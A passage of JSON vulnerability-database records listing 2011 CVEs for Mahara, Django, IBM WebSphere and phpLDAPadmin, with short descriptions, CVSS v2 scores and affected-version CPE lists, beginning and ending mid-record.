"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-25T02:05:42", "id": "FEDORA:25B06216FB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KPKZ2UHHVUFOICJ7E37URQR5ORDUI354/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:15:55", "description": "The get_dataroot_image_path function in lib/file.php in Mahara before 1.4.1 does not properly validate uploaded image files, which allows remote attackers to cause a denial of service (memory consumption) via a (1) large or (2) invalid image.", "cvss3": {}, "published": "2011-11-15T03:57:00", "type": "cve", "title": "CVE-2011-2772", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2772"], "modified": "2012-03-12T04:00:00", "cpe": ["cpe:/a:mahara:mahara:1.3.1", "cpe:/a:mahara:mahara:1.2.0", "cpe:/a:mahara:mahara:1.2.5", "cpe:/a:mahara:mahara:1.2.4", "cpe:/a:mahara:mahara:0.9.2", "cpe:/a:mahara:mahara:1.3.0", "cpe:/a:mahara:mahara:1.1.1", "cpe:/a:mahara:mahara:1.4.0", "cpe:/a:mahara:mahara:1.3.5", "cpe:/a:mahara:mahara:1.1.3", "cpe:/a:mahara:mahara:1.0.8", "cpe:/a:mahara:mahara:1.0.11", "cpe:/a:mahara:mahara:1.0.9", "cpe:/a:mahara:mahara:1.1.8", "cpe:/a:mahara:mahara:1.1.9", "cpe:/a:mahara:mahara:1.3.4", "cpe:/a:mahara:mahara:1.3.7", "cpe:/a:mahara:mahara:1.0.4", "cpe:/a:mahara:mahara:1.0.0", "cpe:/a:mahara:mahara:1.0.7", "cpe:/a:mahara:mahara:1.3.6", "cpe:/a:mahara:mahara:1.3.2", "cpe:/a:mahara:mahara:1.2.6", "cpe:/a:mahara:mahara:1.0.12", "cpe:/a:mahara:mahara:0.9.1", "cpe:/a:mahara:mahara:1.0.2", "cpe:/a:mahara:mahara:1.1.4", "cpe:/a:mahara:mahara:1.0.15", "cpe:/a:mahara:mahara:1.0.6", "cpe:/a:mahara:mahara:1.1.2", "cpe:/a:mahara:mahara:1.2.3", "cpe:/a:mahara:mahara:1.0.13", "cpe:/a:mahara:mahara:1.0.3", "cpe:/a:mahara:mahara:1.3.3", "cpe:/a:mahara:mahara:1.0.14", "cpe:/a:mahara:mahara:1.1", "cpe:/a:mahara:mahara:1.0.10", "cpe:/a:mahara:mahara:1.1.5", "cpe:/a:mahara:mahara:1.1.6", "cpe:/a:mahara:mahara:1.0.1", "cpe:/a:mahara:mahara:1.2.1", "cpe:/a:mahara:mahara:1.2.2", "cpe:/a:mahara:mahara:1.1.0", "cpe:/a:mahara:mahara:1.1.7", "cpe:/a:mahara:mahara:1.0.5", "cpe:/a:mahara:mahara:1.4", "cpe:/a:mahara:mahara:0.9.0"], "id": "CVE-2011-2772", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2772", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:38", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host header to construct a full URL in certain circumstances, which allows remote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4139", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4139", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:52:06", "description": "Directory traversal vulnerability in the administration console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41, 7.0 before 7.0.0.19, and 8.0 before 8.0.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.", "cvss3": {}, "published": "2011-09-06T15:55:00", "type": "cve", "title": "CVE-2011-1359", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1359"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:ibm:websphere_application_server:6.1.0.21", "cpe:/a:ibm:websphere_application_server:6.1.6", "cpe:/a:ibm:websphere_application_server:6.1.0", "cpe:/a:ibm:websphere_application_server:6.1.0.33", "cpe:/a:ibm:websphere_application_server:6.1", "cpe:/a:ibm:websphere_application_server:6.1.0.0", "cpe:/a:ibm:websphere_application_server:7.0.0.11", "cpe:/a:ibm:websphere_application_server:7.0.0.1", "cpe:/a:ibm:websphere_application_server:6.1.0.19", "cpe:/a:ibm:websphere_application_server:6.1.0.23", "cpe:/a:ibm:websphere_application_server:7.0.0.2", "cpe:/a:ibm:websphere_application_server:6.1.0.3", "cpe:/a:ibm:websphere_application_server:6.1.0.12", "cpe:/a:ibm:websphere_application_server:6.1.0.17", "cpe:/a:ibm:websphere_application_server:6.1.0.27", "cpe:/a:ibm:websphere_application_server:6.1.14", "cpe:/a:ibm:websphere_application_server:6.1.0.11", "cpe:/a:ibm:websphere_application_server:6.1.5", "cpe:/a:ibm:websphere_application_server:7.0.0.13", "cpe:/a:ibm:websphere_application_server:6.1.7", "cpe:/a:ibm:websphere_application_server:7.0.0.3", "cpe:/a:ibm:websphere_application_server:8.0.0.0", "cpe:/a:ibm:websphere_application_server:6.1.0.9", "cpe:/a:ibm:websphere_application_server:7.0.0.4", "cpe:/a:ibm:websphere_application_server:6.1.0.35", "cpe:/a:ibm:websphere_application_server:6.1.0.15", "cpe:/a:ibm:websphere_application_server:6.1.0.37", "cpe:/a:ibm:websphere_application_server:6.1.3", "cpe:/a:ibm:websphere_application_server:6.1.0.31", "cpe:/a:ibm:websphere_application_server:7.0.0.8", "cpe:/a:ibm:websphere_application_server:6.1.0.2", "cpe:/a:ibm:websphere_application_server:7.0.0.9", "cpe:/a:ibm:websphere_application_server:6.1.0.1", "cpe:/a:ibm:websphere_application_server:7.0.0.5", "cpe:/a:ibm:websphere_application_server:6.1.1", "cpe:/a:ibm:websphere_application_server:6.1.0.29", "cpe:/a:ibm:websphere_application_server:7.0.0.7", "cpe:/a:ibm:websphere_application_server:6.1.13", "cpe:/a:ibm:websphere_application_server:6.1.0.39", "cpe:/a:ibm:websphere_application_server:7.0.0.6", "cpe:/a:ibm:websphere_application_server:7.0.0.17", "cpe:/a:ibm:websphere_application_server:7.0", "cpe:/a:ibm:websphere_application_server:6.1.0.25", "cpe:/a:ibm:websphere_application_server:6.1.0.5", "cpe:/a:ibm:websphere_application_server:7.0.0.15", "cpe:/a:ibm:websphere_application_server:6.1.0.7"], "id": "CVE-2011-1359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1359", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:ibm:websphere_application_server:6.1.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:8.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:37", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity through a HEAD request, but then uses a GET request for the new target URL in the case of a redirect, which might allow remote attackers to trigger arbitrary GET requests with an unintended source IP address via a crafted Location header.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4138", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4138", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:37:18", "description": "Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug command.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "cve", "title": "CVE-2011-4074", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074"], "modified": "2020-11-09T13:30:00", "cpe": ["cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.2", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.4", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.3", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.5", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1"], "id": "CVE-2011-4074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4074", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:39", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4140", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4140", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", 